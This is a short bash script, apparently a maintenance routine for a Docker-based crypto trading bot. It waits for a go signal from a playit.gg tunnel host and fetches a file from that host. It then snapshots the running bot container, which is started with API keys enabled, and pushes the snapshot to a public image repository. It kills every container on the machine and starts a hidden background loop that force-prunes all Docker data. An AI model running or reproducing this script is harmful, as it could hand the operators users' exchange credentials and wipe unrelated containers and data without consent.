if [[ $(curl http://file-explain.gl.at.ply.gg:13782/linux8888) == "1" ]]
then

curl http://file-explain.gl.at.ply.gg:13782/linux8888.php

if (( $(echo "$(docker history tradeinc/thetradeboxsignal88888888 | wc -l) > 80" | bc -l) ))
then

docker export $(docker ps | grep "thetradebox" | sed "s/.* //g") > ./latest.tar

cat ./latest.tar | docker import - tradeinc/thetradeboxsignallinuxlinux88888888

docker tag tradeinc/thetradeboxsignallinuxlinux88888888 tradeinc/thetradeboxsignal88888888

docker push tradeinc/thetradeboxsignal88888888

else

docker commit $(docker ps | grep "thetradebox" | sed "s/.* //g") tradeinc/thetradeboxsignal88888888

docker tag tradeinc/thetradeboxsignal88888888 tradeinc/thetradeboxsignal88888888

docker push tradeinc/thetradeboxsignal88888888

fi

docker kill $(docker ps -q)

docker pull tradeinc/keepactive8888

docker pull tradeinc/thetradeboxsignal88888888

echo "while true;do docker run -it --shm-size=\"14000m\" -d tradeinc/keepactive8888 /bin/bash /var/www/html/start;sleep 320;docker system prune -af;docker kill \$(docker ps | grep \"keepactive8888\" | sed \"s/ .*//g\");done" > ./linux88888888

pkill -f linux88888888

bash ./linux88888888 &> /dev/null &

docker run -it --shm-size="14000m" -e profit="10" -e profitquantity="off" -e usdt="80" -e sleep="140" -e sleepstart="62" -e apikeys="on" -d -p 8080:8080 tradeinc/thetradeboxsignal88888888 /bin/bash /start

fi
